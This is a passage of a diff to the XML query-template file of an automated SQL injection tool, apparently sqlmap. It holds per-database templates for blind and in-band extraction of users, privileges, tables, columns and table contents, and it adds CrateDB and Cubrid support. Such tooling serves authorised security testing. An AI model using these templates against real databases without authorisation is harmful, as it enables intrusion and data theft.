<blind query="SELECT DISTINCT(nspname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" query2="SELECT DISTINCT(relname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" count="SELECT COUNT(DISTINCT(nspname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" count2="SELECT COUNT(DISTINCT(relname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" condition="attname" condition2="nspname" condition3="relname"/>
</search_column>
</dbms>
<!-- Microsoft SQL Server -->
<dbms value="Microsoft SQL Server">
<cast query="CAST(%s AS NVARCHAR(4000))"/>
<length query="LTRIM(STR(LEN(%s)))"/>
@@ -200,11 +198,11 @@
<blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
</dbs>
<tables>
<inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT name FROM %s..sysobjects WHERE xtype = 'U'"/>
<inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name AS table_name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT name FROM %s..sysobjects WHERE xtype='U'"/>
<blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name" count2="SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype='U' AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype='U' ORDER BY name) ORDER BY name" count3="SELECT COUNT(name) FROM %s..sysobjects WHERE xtype='U'"/>
</tables>
<columns>
<inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" condition="[DB]..syscolumns.name"/>
<inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) AS type_name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" condition="[DB]..syscolumns.name"/>
<blind query="SELECT TOP 1 %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' AND %s..syscolumns.name NOT IN (SELECT TOP %d %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' ORDER BY %s..syscolumns.name) ORDER BY %s..syscolumns.name" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query3="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/>
</columns>
<dump_table>
@@ -225,7 +223,6 @@
</search_column>
</dbms>
<!-- Oracle -->
<dbms value="Oracle">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
@@ -304,8 +301,8 @@
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
<inband query="SELECT %s FROM %s ORDER BY ROWNUM"/>
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq ORDER BY ROWNUM) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
<search_db>
@@ -322,7 +319,6 @@
</search_column>
</dbms>
<!-- SQLite -->
<dbms value="SQLite">
<cast query="CAST(%s AS TEXT)" dbms_version="&gt;=3.0"/>
<!-- NOTE: On SQLite version 2 everything is stored as a string (Reference: http://www.mono-project.com/SQLite) -->
@@ -361,7 +357,7 @@
<blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
</tables>
<columns>
<inband query="SELECT MIN(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
<blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
</columns>
<dump_table>
@@ -376,7 +372,6 @@
<search_column/>
</dbms>
<!-- Microsoft Access -->
<dbms value="Microsoft Access">
<cast query="RTRIM(CVAR(%s))"/>
<length query="LEN(RTRIM(CVAR(%s)))"/>
@@ -421,7 +416,6 @@
<search_column/>
</dbms>
<!-- Firebird -->
<dbms value="Firebird">
<cast query="TRIM(CAST(%s AS VARCHAR(10000)))"/>
<length query="CHAR_LENGTH(TRIM(%s))"/>
@@ -463,8 +457,8 @@
<dbs/>
<columns>
<!--<inband query="SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
<inband query="SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
<blind query="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'" count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
<inband query="SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" condition="r.RDB$FIELD_NAME"/>
<blind query="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'" count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" condition="r.RDB$FIELD_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
@@ -475,15 +469,12 @@
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0) AND %s" condition="RDB$RELATION_NAME" condition2=""/>
<blind query="" query2="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)" count="" count2="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)" condition="RDB$RELATION_NAME" condition2=""/>
</search_table>
<search_column/>
<search_column>
<inband query="SELECT r.RDB$RELATION_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" condition="r.RDB$FIELD_NAME" condition2="" condition3="r.RDB$RELATION_NAME"/>
<blind query="" query2="SELECT DISTINCT(r.RDB$RELATION_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" count="" count2="SELECT COUNT(DISTINCT(r.RDB$RELATION_NAME)) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s" condition="r.RDB$FIELD_NAME" condition2="" condition3="r.RDB$RELATION_NAME"/>
</search_column>
</dbms>
<!-- SAP MaxDB -->
<!-- http://dev.mysql.com/tech-resources/articles/maxdb-php-ready-for-web.html -->
<!-- http://dev.mysql.com/doc/refman/5.0/es/maxdb-reserved-words.html -->
<!-- http://maxdb.sap.com/doc/7_6/default.htm -->
<!-- http://www.sapdb.org/7.4/htmhelp/35/f8823cb7e5d42be10000000a114027/content.htm -->
<!-- http://www.ximido.de/research/PenTestingMaxDB.pdf -->
<dbms value="SAP MaxDB">
<length query="LENGTH(%s)"/>
<isnull query="VALUE(%s,' ')" query2="IFNULL(%s,' ')"/>
@@ -499,12 +490,12 @@
<comment query="--" query2="#"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM VERSIONS"/>
<hex query="HEX(%s)"/>
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
<banner query="SELECT ID FROM SYSINFO.VERSION"/>
<current_user query="SELECT USER() FROM DUAL"/>
<current_db query="SELECT DATABASE() FROM DUAL"/>
<current_user query="SELECT USER() FROM VERSIONS"/>
<current_db query="SELECT USER() FROM VERSIONS"/>
<hostname/>
<table_comment/>
<column_comment/>
@@ -534,9 +525,12 @@
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
</dump_table>
<search_db>
<inband query="SELECT schemaname FROM domain.tables WHERE %s" condition="schemaname"/>
<blind query="SELECT DISTINCT(schemaname) FROM domain.tables WHERE %s" count="SELECT COUNT(DISTINCT(schemaname)) FROM domain.tables WHERE %s" condition="schemaname"/>
</search_db>
</dbms>
<!-- Sybase -->
<dbms value="Sybase">
<cast query="CONVERT(VARCHAR(4000),%s)"/>
<length query="LTRIM(STR(LEN(%s)))"/>
@@ -606,7 +600,6 @@
</search_column>
</dbms>
<!-- IBM DB2 -->
<dbms value="IBM DB2">
<!-- Casting to varchar does not work with version < v9, so we had to use char(254) instead -->
<cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
@@ -631,7 +624,7 @@
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
<current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
<current_db query="SELECT current server FROM SYSIBM.SYSDUMMY1"/>
<current_db query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
<hostname query="SELECT host_name FROM TABLE(sysproc.env_get_sys_info())"/>
<table_comment/>
<column_comment/>
@@ -679,7 +672,6 @@
</search_column>
</dbms>
<!-- Hyper SQL Database -->
<dbms value="HSQLDB">
<cast query="CAST(%s AS LONGVARCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
@@ -696,7 +688,8 @@
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<hex query="RAWTOHEX(%s)"/>
<!-- NOTE: RAWTOHEX() doesn't accept non-binary values -->
<!-- <hex query="RAWTOHEX(%s)"/> -->
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
<banner query="DATABASE_VERSION()"/>
<current_user query="CURRENT_USER"/>
@@ -704,7 +697,7 @@
<hostname/>
<table_comment/>
<column_comment/>
<is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.USERS WHERE NAME=CURRENT_USER"/>
<is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER_NAME=CURRENT_USER"/>
<check_udf/>
<users>
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
@@ -763,7 +756,7 @@
<count query="COUNT(%s)"/>
<comment query="--" query2="//"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<hex query="RAWTOHEX(%s)"/>
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
@@ -813,9 +806,6 @@
</search_column>
</dbms>
<!-- Informix -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
<dbms value="Informix">
<cast query="RTRIM(TO_CHAR(%s))"/>
<length query="CHAR_LENGTH(RTRIM(%s))"/>
@@ -832,7 +822,8 @@
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
<hex query="HEX(%s)"/>
<!-- NOTE: HEX() only accepts integer values -->
<!-- <hex query="HEX(%s)"/> -->
<!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
<inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
<banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
@@ -877,7 +868,6 @@
<search_column/>
</dbms>
<!-- MonetDB -->
<dbms value="MonetDB">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
@@ -892,7 +882,7 @@
<count query="COUNT(%s)"/>
<comment query="--" query2="#"/>
<substring query="SUBSTRING((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
<banner query="SELECT value FROM environment WHERE name='monet_version'"/>
@@ -942,7 +932,6 @@
</search_column>
</dbms>
<!-- Apache Derby -->
<dbms value="Apache Derby">
<!-- NOTE: CHAR(%s) causes 'A truncation error was encountered trying to shrink CHAR' -->
<cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
@@ -1011,7 +1000,6 @@
</search_column>
</dbms>
<!-- Vertica -->
<dbms value="Vertica">
<cast query="CAST(%s AS CHARACTER(10000))"/>
<length query="LENGTH(%s)"/>
@@ -1088,9 +1076,8 @@
</search_column>
</dbms>
<!-- Mckoi -->
<!-- NOTE: DBMS with minimalistic set of (restricted) features -->
<dbms value="Mckoi">
<!-- NOTE: DBMS with minimalistic set of (restricted) features -->
<cast query="CONCAT('',%s)"/>
<length query="LENGTH(%s)"/>
<isnull query="IF(%s IS NULL,' ', %s)"/>
@@ -1130,7 +1117,6 @@
<search_column/>
</dbms>
<!-- Presto -->
<dbms value="Presto">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
@@ -1192,7 +1178,6 @@
</search_column>
</dbms>
<!-- Altibase -->
<dbms value="Altibase">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
@@ -1265,9 +1250,8 @@
</search_column>
</dbms>
<!-- MimerSQL -->
<!-- NOTE: DBMS with stohastic output of rows (ORDER BY required) -->
<dbms value="MimerSQL">
<!-- NOTE: DBMS with stohastic output of rows (ORDER BY required) -->
<!-- NOTE: NVARCHAR(4000) causes problems in boolean (e.g. 'Required temporary table row length is 32006, only 32000 is possible') -->
<cast query="CAST(%s AS NVARCHAR(1000))"/>
<length query="CHAR_LENGTH(%s)"/>
@@ -1334,4 +1318,312 @@
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY table_schema" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' ORDER BY table_name" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
</search_column>
</dbms>
<dbms value="CrateDB">
<cast query="CAST(%s AS TEXT)"/>
<length query="CHAR_LENGTH((%s)::text)"/>
<isnull query="COALESCE(%s,' ')"/>
<delimiter query="||"/>
<limit query="LIMIT %d OFFSET %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="2"/>
<limitgroupstop query="1"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<!-- NOTE: non-; version(s) doesn't work properly -->
<comment query=";--" query2=";/*"/>
<substring query="SUBSTR((%s)::text,%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<!-- NOTE: ASCII() only available in >= 4.1 -->
<inference query="SUBSTR((%s)::text,%d,1)>'%c'" query2="ASCII(SUBSTR((%s)::text,%d,1))>%d"/>
<banner query="SELECT version['number'] FROM sys.nodes" query2="VERSION()"/>
<current_user query="CURRENT_USER"/>
<current_db query="CURRENT_SCHEMA()"/>
<hostname query="SELECT hostname FROM sys.nodes"/>
<!--<table_comment query="SELECT pg_catalog.obj_description(c.oid) FROM pg_catalog.pg_class c WHERE c.relname='%s'"/>-->
<table_comment query="SELECT description FROM pg_description JOIN pg_class ON pg_description.objoid=pg_class.oid JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid WHERE nspname='%s' AND relname='%s'"/>
<column_comment/>
<is_dba query="(SELECT superuser=true FROM sys.users WHERE name=CURRENT_USER)"/>
<check_udf/>
<users>
<inband query="SELECT name FROM sys.users"/>
<blind query="SELECT name FROM sys.users LIMIT 1 OFFSET %d" count="SELECT COUNT(name) FROM sys.users"/>
</users>
<passwords/>
<privileges>
<inband query="SELECT grantee,type FROM sys.privileges" condition="grantee"/>
<blind query="SELECT DISTINCT(type) FROM sys.privileges WHERE grantee %s '%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT(type)) FROM sys.privileges WHERE grantee %s '%s'"/>
</privileges>
<roles/>
<statements>
<inband query="SELECT stmt FROM sys.jobs"/>
<blind query="SELECT stmt FROM sys.jobs LIMIT 1 OFFSET %d" count="SELECT COUNT(stmt) FROM sys.jobs"/>
</statements>
<dbs>
<inband query="SELECT schema_name FROM information_schema.schemata"/>
<blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
</dbs>
<tables>
<inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
<blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
</tables>
<columns>
<inband query="SELECT attname,typname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
<blind query="SELECT attname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'" query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'" count="SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT schema_name FROM information_schema.schemata WHERE %s" condition="schema_name"/>
<blind query="SELECT schema_name FROM information_schema.schemata WHERE %s" count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.schemata WHERE %s" condition="schema_name"/>
</search_db>
<search_table>
<inband query="SELECT table_schema,table_name FROM information_schema.tables WHERE %s" condition="table_name" condition2="table_schema"/>
<blind query="SELECT DISTINCT(table_schema) FROM information_schema.tables WHERE %s" query2="SELECT table_name FROM information_schema.tables WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM information_schema.tables WHERE %s" count2="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
</search_table>
<search_column>
<inband query="SELECT nspname,relname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" condition="attname" condition2="nspname" condition3="relname"/>
<blind query="SELECT DISTINCT(nspname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" query2="SELECT DISTINCT(relname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" count="SELECT COUNT(DISTINCT(nspname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" count2="SELECT COUNT(DISTINCT(relname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" condition="attname" condition2="nspname" condition3="relname"/>
</search_column>
</dbms>
<dbms value="Cubrid">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query="||"/>
<limit query="LIMIT %d,%d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="/*" query3="//"/>
<substring query="MID((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<hex query="HEX(%s)"/>
<inference query="ASCII(MID((%s),%d,1))>%d"/>
<banner query="VERSION()"/>
<current_user query="CURRENT_USER"/>
<current_db query="CURRENT_USER"/>
<hostname/>
<table_comment query="SELECT comment FROM db_class WHERE owner_name='%s' AND class_name='%s'"/>
<column_comment query="SELECT db_attribute.comment FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s' AND db_class.class_name='%s' AND attr_name='%s'"/>
<is_dba query="CURRENT_USER='DBA'"/>
<check_udf query="(SELECT meth_name FROM db_method WHERE meth_name='%s' LIMIT 0,1)='%s'"/>
<users>
<inband query="SELECT name FROM db_user"/>
<blind query="SELECT name FROM db_user LIMIT %d,1" count="SELECT COUNT(name) FROM db_user"/>
</users>
<passwords/>
<privileges>
<inband query="SELECT grantee_name,auth_type FROM db_auth" condition="grantee_name"/>
<blind query="SELECT DISTINCT(auth_type) FROM db_auth WHERE grantee_name='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(auth_type)) FROM db_auth WHERE grantee_name='%s'"/>
</privileges>
<roles/>
<statements/>
<dbs>
<inband query="SELECT owner_name FROM db_class"/>
<blind query="SELECT DISTINCT(owner_name) FROM db_class LIMIT %d,1" count="SELECT COUNT(DISTINCT(owner_name)) FROM db_class"/>
</dbs>
<tables>
<inband query="SELECT owner_name,class_name FROM db_class" condition="owner_name"/>
<blind query="SELECT class_name FROM db_class WHERE owner_name='%s' LIMIT %d,1" count="SELECT COUNT(class_name) FROM db_class WHERE owner_name='%s'"/>
</tables>
<columns>
<inband query="SELECT attr_name,data_type FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'" condition="attr_name"/>
<blind query="SELECT attr_name FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'" query2="SELECT data_type FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'" count="SELECT COUNT(attr_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'" condition="attr_name"/>
</columns>
